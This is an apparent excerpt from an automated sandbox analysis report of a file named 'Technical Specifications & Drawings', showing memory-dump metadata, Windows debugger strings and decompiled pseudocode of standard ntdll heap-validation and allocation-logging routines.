                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  control_flow_graph 9 17e9780-17e978c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  control_flow_graph 6 17e9660-17e966c LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  control_flow_graph 7 17e96e0-17e96ec LdrInitializeThunk
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  control_flow_graph 0 17e967a-17e967f 1 17e968f-17e9696 LdrInitializeThunk 0->1 2 17e9681-17e9688 0->2
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346367490.0000000000420000.00000040.00000400.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_420000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346367490.0000000000420000.00000040.00000400.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_420000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  • Go determine why that thread has not released the critical section., xrefs: 0185B3C5
                                                  • write to, xrefs: 0185B4A6
                                                  • The resource is owned shared by %d threads, xrefs: 0185B37E
                                                  • *** An Access Violation occurred in %ws:%s, xrefs: 0185B48F
                                                  • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0185B2F3
                                                  • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0185B47D
                                                  • *** Inpage error in %ws:%s, xrefs: 0185B418
                                                  • *** enter .exr %p for the exception record, xrefs: 0185B4F1
                                                  • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0185B39B
                                                  • The critical section is owned by thread %p., xrefs: 0185B3B9
                                                  • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0185B484
                                                  • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0185B323
                                                  • read from, xrefs: 0185B4AD, 0185B4B2
                                                  • an invalid address, %p, xrefs: 0185B4CF
                                                  • The instruction at %p referenced memory at %p., xrefs: 0185B432
                                                  • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0185B476
                                                  • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0185B305
                                                  • *** enter .cxr %p for the context, xrefs: 0185B50D
                                                  • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0185B3D6
                                                  • *** Resource timeout (%p) in %ws:%s, xrefs: 0185B352
                                                  • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0185B53F
                                                  • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0185B2DC
                                                  • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0185B314
                                                  • The resource is owned exclusively by thread %p, xrefs: 0185B374
                                                  • <unknown>, xrefs: 0185B27E, 0185B2D1, 0185B350, 0185B399, 0185B417, 0185B48E
                                                  • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0185B38F
                                                  • This failed because of error %Ix., xrefs: 0185B446
                                                  • *** then kb to get the faulting stack, xrefs: 0185B51C
                                                  • a NULL pointer, xrefs: 0185B4E0
                                                  • The instruction at %p tried to %s , xrefs: 0185B4B6
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • API String ID: 0-108210295
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 44%
                                                  			E01861C06() {
                                                  				signed int _t27;
                                                  				char* _t104;
                                                  				char* _t105;
                                                  				intOrPtr _t113;
                                                  				intOrPtr _t115;
                                                  				intOrPtr _t117;
                                                  				intOrPtr _t119;
                                                  				intOrPtr _t120;
                                                  
                                                  				_t105 = 0x17848a4;
                                                  				_t104 = "HEAP: ";
                                                  				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                  					_push(_t104);
                                                  					E017AB150();
                                                  				} else {
                                                  					E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                  				}
                                                  				_push( *0x189589c);
                                                  				E017AB150("Heap error detected at %p (heap handle %p)\n",  *0x18958a0);
                                                  				_t27 =  *0x1895898; // 0x0
                                                  				if(_t27 <= 0xf) {
                                                  					switch( *((intOrPtr*)(_t27 * 4 +  &M01861E96))) {
                                                  						case 0:
                                                  							_t105 = "heap_failure_internal";
                                                  							goto L21;
                                                  						case 1:
                                                  							goto L21;
                                                  						case 2:
                                                  							goto L21;
                                                  						case 3:
                                                  							goto L21;
                                                  						case 4:
                                                  							goto L21;
                                                  						case 5:
                                                  							goto L21;
                                                  						case 6:
                                                  							goto L21;
                                                  						case 7:
                                                  							goto L21;
                                                  						case 8:
                                                  							goto L21;
                                                  						case 9:
                                                  							goto L21;
                                                  						case 0xa:
                                                  							goto L21;
                                                  						case 0xb:
                                                  							goto L21;
                                                  						case 0xc:
                                                  							goto L21;
                                                  						case 0xd:
                                                  							goto L21;
                                                  						case 0xe:
                                                  							goto L21;
                                                  						case 0xf:
                                                  							goto L21;
                                                  					}
                                                  				}
                                                  				L21:
                                                  				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                  					_push(_t104);
                                                  					E017AB150();
                                                  				} else {
                                                  					E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                  				}
                                                  				_push(_t105);
                                                  				E017AB150("Error code: %d - %s\n",  *0x1895898);
                                                  				_t113 =  *0x18958a4; // 0x0
                                                  				if(_t113 != 0) {
                                                  					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                  						_push(_t104);
                                                  						E017AB150();
                                                  					} else {
                                                  						E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                  					}
                                                  					E017AB150("Parameter1: %p\n",  *0x18958a4);
                                                  				}
                                                  				_t115 =  *0x18958a8; // 0x0
                                                  				if(_t115 != 0) {
                                                  					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                  						_push(_t104);
                                                  						E017AB150();
                                                  					} else {
                                                  						E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                  					}
                                                  					E017AB150("Parameter2: %p\n",  *0x18958a8);
                                                  				}
                                                  				_t117 =  *0x18958ac; // 0x0
                                                  				if(_t117 != 0) {
                                                  					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                  						_push(_t104);
                                                  						E017AB150();
                                                  					} else {
                                                  						E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                  					}
                                                  					E017AB150("Parameter3: %p\n",  *0x18958ac);
                                                  				}
                                                  				_t119 =  *0x18958b0; // 0x0
                                                  				if(_t119 != 0) {
                                                  					L41:
                                                  					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                  						_push(_t104);
                                                  						E017AB150();
                                                  					} else {
                                                  						E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                  					}
                                                  					_push( *0x18958b4);
                                                  					E017AB150("Last known valid blocks: before - %p, after - %p\n",  *0x18958b0);
                                                  				} else {
                                                  					_t120 =  *0x18958b4; // 0x0
                                                  					if(_t120 != 0) {
                                                  						goto L41;
                                                  					}
                                                  				}
                                                  				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                  					_push(_t104);
                                                  					E017AB150();
                                                  				} else {
                                                  					E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                  				}
                                                  				return E017AB150("Stack trace available at %p\n", 0x18958c0);
                                                  			}












                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                  • API String ID: 0-2897834094
                                                  • Opcode ID: 809418154b7d69afe69c2cac46422c544604145cb16014999f6a0ab0bd4bbc60
                                                  • Instruction ID: 1a7f6bb0392e9d68d3282a2c04e57932aff82895a72b6c5a4d076b0e440544a7
                                                  • Opcode Fuzzy Hash: 809418154b7d69afe69c2cac46422c544604145cb16014999f6a0ab0bd4bbc60
                                                  • Instruction Fuzzy Hash: BA61E833955149DFD721EB49E8DCD25F3A8E794B20B49813EF409AF316DA249A40CF0A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 64%
                                                  			E01862D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                                                  				signed int _t83;
                                                  				signed char _t89;
                                                  				intOrPtr _t90;
                                                  				signed char _t101;
                                                  				signed int _t102;
                                                  				intOrPtr _t104;
                                                  				signed int _t105;
                                                  				signed int _t106;
                                                  				intOrPtr _t108;
                                                  				intOrPtr _t112;
                                                  				short* _t130;
                                                  				short _t131;
                                                  				signed int _t148;
                                                  				intOrPtr _t149;
                                                  				signed int* _t154;
                                                  				short* _t165;
                                                  				signed int _t171;
                                                  				void* _t182;
                                                  
                                                  				_push(0x44);
                                                  				_push(0x1880e80);
                                                  				E017FD0E8(__ebx, __edi, __esi);
                                                  				_t177 = __edx;
                                                  				_t181 = __ecx;
                                                  				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
                                                  				 *((char*)(_t182 - 0x1d)) = 0;
                                                  				 *(_t182 - 0x24) = 0;
                                                  				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
                                                  					 *((intOrPtr*)(_t182 - 4)) = 0;
                                                  					 *((intOrPtr*)(_t182 - 4)) = 1;
                                                  					_t83 = E017A40E1("RtlAllocateHeap");
                                                  					__eflags = _t83;
                                                  					if(_t83 == 0) {
                                                  						L48:
                                                  						 *(_t182 - 0x24) = 0;
                                                  						L49:
                                                  						 *((intOrPtr*)(_t182 - 4)) = 0;
                                                  						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
                                                  						E018630C4();
                                                  						goto L50;
                                                  					}
                                                  					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
                                                  					 *(_t182 - 0x28) = _t89;
                                                  					 *(_t182 - 0x3c) = _t89;
                                                  					_t177 =  *(_t182 + 8);
                                                  					__eflags = _t177;
                                                  					if(_t177 == 0) {
                                                  						_t171 = 1;
                                                  						__eflags = 1;
                                                  					} else {
                                                  						_t171 = _t177;
                                                  					}
                                                  					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
                                                  					__eflags = _t148 - 0x10;
                                                  					if(_t148 < 0x10) {
                                                  						_t148 = 0x10;
                                                  					}
                                                  					_t149 = _t148 + 8;
                                                  					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
                                                  					__eflags = _t149 - _t177;
                                                  					if(_t149 < _t177) {
                                                  						L44:
                                                  						_t90 =  *[fs:0x30];
                                                  						__eflags =  *(_t90 + 0xc);
                                                  						if( *(_t90 + 0xc) == 0) {
                                                  							_push("HEAP: ");
                                                  							E017AB150();
                                                  						} else {
                                                  							E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                  						}
                                                  						_push( *((intOrPtr*)(_t181 + 0x78)));
                                                  						E017AB150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
                                                  						goto L48;
                                                  					} else {
                                                  						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
                                                  						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
                                                  							goto L44;
                                                  						}
                                                  						__eflags = _t89 & 0x00000001;
                                                  						if((_t89 & 0x00000001) != 0) {
                                                  							_t178 =  *(_t182 - 0x28);
                                                  						} else {
                                                  							E017BEEF0( *((intOrPtr*)(_t181 + 0xc8)));
                                                  							 *((char*)(_t182 - 0x1d)) = 1;
                                                  							_t178 =  *(_t182 - 0x28) | 0x00000001;
                                                  							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
                                                  						}
                                                  						E01864496(_t181, 0);
                                                  						_t177 = L017C4620(_t181, _t181, _t178,  *(_t182 + 8));
                                                  						 *(_t182 - 0x24) = _t177;
                                                  						_t173 = 1;
                                                  						E018649A4(_t181);
                                                  						__eflags = _t177;
                                                  						if(_t177 == 0) {
                                                  							goto L49;
                                                  						} else {
                                                  							_t177 = _t177 + 0xfffffff8;
                                                  							__eflags =  *((char*)(_t177 + 7)) - 5;
                                                  							if( *((char*)(_t177 + 7)) == 5) {
                                                  								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
                                                  								__eflags = _t177;
                                                  							}
                                                  							_t154 = _t177;
                                                  							 *(_t182 - 0x40) = _t177;
                                                  							__eflags =  *(_t181 + 0x4c);
                                                  							if( *(_t181 + 0x4c) != 0) {
                                                  								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
                                                  								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
                                                  								if(__eflags != 0) {
                                                  									_push(_t154);
                                                  									_t173 = _t177;
                                                  									E0185FA2B(0, _t181, _t177, _t177, _t181, __eflags);
                                                  								}
                                                  							}
                                                  							__eflags =  *(_t177 + 2) & 0x00000002;
                                                  							if(( *(_t177 + 2) & 0x00000002) == 0) {
                                                  								_t101 =  *(_t177 + 3);
                                                  								 *(_t182 - 0x29) = _t101;
                                                  								_t102 = _t101 & 0x000000ff;
                                                  							} else {
                                                  								_t130 = E017A1F5B(_t177);
                                                  								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
                                                  								__eflags =  *(_t181 + 0x40) & 0x08000000;
                                                  								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
                                                  									 *_t130 = 0;
                                                  								} else {
                                                  									_t131 = E017D16C7(1, _t173);
                                                  									_t165 =  *((intOrPtr*)(_t182 - 0x30));
                                                  									 *_t165 = _t131;
                                                  									_t130 = _t165;
                                                  								}
                                                  								_t102 =  *(_t130 + 2) & 0x0000ffff;
                                                  							}
                                                  							 *(_t182 - 0x34) = _t102;
                                                  							 *(_t182 - 0x28) = _t102;
                                                  							__eflags =  *(_t181 + 0x4c);
                                                  							if( *(_t181 + 0x4c) != 0) {
                                                  								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
                                                  								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
                                                  								__eflags =  *_t177;
                                                  							}
                                                  							__eflags =  *(_t181 + 0x40) & 0x20000000;
                                                  							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
                                                  								__eflags = 0;
                                                  								E01864496(_t181, 0);
                                                  							}
                                                  							__eflags =  *(_t182 - 0x24) -  *0x1896360; // 0x0
                                                  							_t104 =  *[fs:0x30];
                                                  							if(__eflags != 0) {
                                                  								_t105 =  *(_t104 + 0x68);
                                                  								 *(_t182 - 0x4c) = _t105;
                                                  								__eflags = _t105 & 0x00000800;
                                                  								if((_t105 & 0x00000800) == 0) {
                                                  									goto L49;
                                                  								}
                                                  								_t106 =  *(_t182 - 0x34);
                                                  								__eflags = _t106;
                                                  								if(_t106 == 0) {
                                                  									goto L49;
                                                  								}
                                                  								__eflags = _t106 -  *0x1896364; // 0x0
                                                  								if(__eflags != 0) {
                                                  									goto L49;
                                                  								}
                                                  								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0x1896366; // 0x0
                                                  								if(__eflags != 0) {
                                                  									goto L49;
                                                  								}
                                                  								_t108 =  *[fs:0x30];
                                                  								__eflags =  *(_t108 + 0xc);
                                                  								if( *(_t108 + 0xc) == 0) {
                                                  									_push("HEAP: ");
                                                  									E017AB150();
                                                  								} else {
                                                  									E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                  								}
                                                  								_push(E0184D455(_t181,  *(_t182 - 0x28)));
                                                  								_push( *(_t182 + 8));
                                                  								E017AB150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
                                                  								goto L34;
                                                  							} else {
                                                  								__eflags =  *(_t104 + 0xc);
                                                  								if( *(_t104 + 0xc) == 0) {
                                                  									_push("HEAP: ");
                                                  									E017AB150();
                                                  								} else {
                                                  									E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                  								}
                                                  								_push( *(_t182 + 8));
                                                  								E017AB150("Just allocated block at %p for %Ix bytes\n",  *0x1896360);
                                                  								L34:
                                                  								_t112 =  *[fs:0x30];
                                                  								__eflags =  *((char*)(_t112 + 2));
                                                  								if( *((char*)(_t112 + 2)) != 0) {
                                                  									 *0x1896378 = 1;
                                                  									 *0x18960c0 = 0;
                                                  									asm("int3");
                                                  									 *0x1896378 = 0;
                                                  								}
                                                  								goto L49;
                                                  							}
                                                  						}
                                                  					}
                                                  				} else {
                                                  					_t181 =  *0x1895708; // 0x0
                                                  					 *0x189b1e0(__ecx, __edx,  *(_t182 + 8));
                                                  					 *_t181();
                                                  					L50:
                                                  					return E017FD130(0, _t177, _t181);
                                                  				}
                                                  			}






















                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmp
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                  • API String ID: 3446177414-1745908468
                                                  • Opcode ID: 9f81fabfda7ad74e29f09d4fea4c01c01b44b1987171330741c3e2ea5c9633a3
                                                  • Instruction ID: 292fb589af78a939538a7c6a9b44ff80baafec7cce12f4c84de098d5ef515fc0
                                                  • Opcode Fuzzy Hash: 9f81fabfda7ad74e29f09d4fea4c01c01b44b1987171330741c3e2ea5c9633a3
                                                  • Instruction Fuzzy Hash: E8912230500645DFDB22DF68C494AADFBF6FF58714F18819DE54ADB252C7329A45CB02
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 59%
                                                  			E01864AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
                                                  				signed int _v6;
                                                  				signed int _v8;
                                                  				signed int _v12;
                                                  				signed int _v16;
                                                  				signed int _v20;
                                                  				signed int _v24;
                                                  				signed int _v28;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* __ebp;
                                                  				signed int _t189;
                                                  				intOrPtr _t191;
                                                  				intOrPtr _t210;
                                                  				signed int _t225;
                                                  				signed char _t231;
                                                  				intOrPtr _t232;
                                                  				unsigned int _t245;
                                                  				intOrPtr _t249;
                                                  				intOrPtr _t259;
                                                  				signed int _t281;
                                                  				signed int _t283;
                                                  				intOrPtr _t284;
                                                  				signed int _t288;
                                                  				signed int* _t294;
                                                  				signed int* _t298;
                                                  				intOrPtr* _t299;
                                                  				intOrPtr* _t300;
                                                  				signed int _t307;
                                                  				signed int _t309;
                                                  				signed short _t312;
                                                  				signed short _t315;
                                                  				signed int _t317;
                                                  				signed int _t320;
                                                  				signed int _t322;
                                                  				signed int _t326;
                                                  				signed int _t327;
                                                  				void* _t328;
                                                  				signed int _t332;
                                                  				signed int _t340;
                                                  				signed int _t342;
                                                  				signed char _t344;
                                                  				signed int* _t345;
                                                  				void* _t346;
                                                  				signed char _t352;
                                                  				signed char _t367;
                                                  				signed int _t374;
                                                  				intOrPtr* _t378;
                                                  				signed int _t380;
                                                  				signed int _t385;
                                                  				signed char _t390;
                                                  				unsigned int _t392;
                                                  				signed char _t395;
                                                  				unsigned int _t397;
                                                  				intOrPtr* _t400;
                                                  				signed int _t402;
                                                  				signed int _t405;
                                                  				intOrPtr* _t406;
                                                  				signed int _t407;
                                                  				intOrPtr _t412;
                                                  				void* _t414;
                                                  				signed int _t415;
                                                  				signed int _t416;
                                                  				signed int _t429;
                                                  
                                                  				_v16 = _v16 & 0x00000000;
                                                  				_t189 = 0;
                                                  				_v8 = _v8 & 0;
                                                  				_t332 = __edx;
                                                  				_v12 = 0;
                                                  				_t414 = __ecx;
                                                  				_t415 = __edx;
                                                  				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
                                                  					L88:
                                                  					_t416 = _v16;
                                                  					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
                                                  						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
                                                  						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
                                                  							L107:
                                                  							return 1;
                                                  						}
                                                  						_t191 =  *[fs:0x30];
                                                  						__eflags =  *(_t191 + 0xc);
                                                  						if( *(_t191 + 0xc) == 0) {
                                                  							_push("HEAP: ");
                                                  							E017AB150();
                                                  						} else {
                                                  							E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                  						}
                                                  						_push(_v12);
                                                  						_push( *((intOrPtr*)(_t332 + 0x30)));
                                                  						_push(_t332);
                                                  						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
                                                  						L122:
                                                  						E017AB150();
                                                  						L119:
                                                  						return 0;
                                                  					}
                                                  					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                  						_push("HEAP: ");
                                                  						E017AB150();
                                                  					} else {
                                                  						E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                  					}
                                                  					_push(_t416);
                                                  					_push( *((intOrPtr*)(_t332 + 0x2c)));
                                                  					_push(_t332);
                                                  					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
                                                  					goto L122;
                                                  				} else {
                                                  					goto L1;
                                                  				}
                                                  				do {
                                                  					L1:
                                                  					 *_a16 = _t415;
                                                  					if( *(_t414 + 0x4c) != 0) {
                                                  						_t392 =  *(_t414 + 0x50) ^  *_t415;
                                                  						 *_t415 = _t392;
                                                  						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
                                                  						_t424 = _t392 >> 0x18 - _t352;
                                                  						if(_t392 >> 0x18 != _t352) {
                                                  							_push(_t352);
                                                  							E0185FA2B(_t332, _t414, _t415, _t414, _t415, _t424);
                                                  						}
                                                  					}
                                                  					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
                                                  						_t210 =  *[fs:0x30];
                                                  						__eflags =  *(_t210 + 0xc);
                                                  						if( *(_t210 + 0xc) == 0) {
                                                  							_push("HEAP: ");
                                                  							E017AB150();
                                                  						} else {
                                                  							E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                  						}
                                                  						_push(_v8 & 0x0000ffff);
                                                  						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
                                                  						__eflags = _t340;
                                                  						_push(_t340);
                                                  						E017AB150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
                                                  						L117:
                                                  						__eflags =  *(_t414 + 0x4c);
                                                  						if( *(_t414 + 0x4c) != 0) {
                                                  							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
                                                  							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
                                                  							__eflags =  *_t415;
                                                  						}
                                                  						goto L119;
                                                  					}
                                                  					_t225 =  *_t415 & 0x0000ffff;
                                                  					_t390 =  *(_t415 + 2);
                                                  					_t342 = _t225;
                                                  					_v8 = _t342;
                                                  					_v20 = _t342;
                                                  					_v28 = _t225 << 3;
                                                  					if((_t390 & 0x00000001) == 0) {
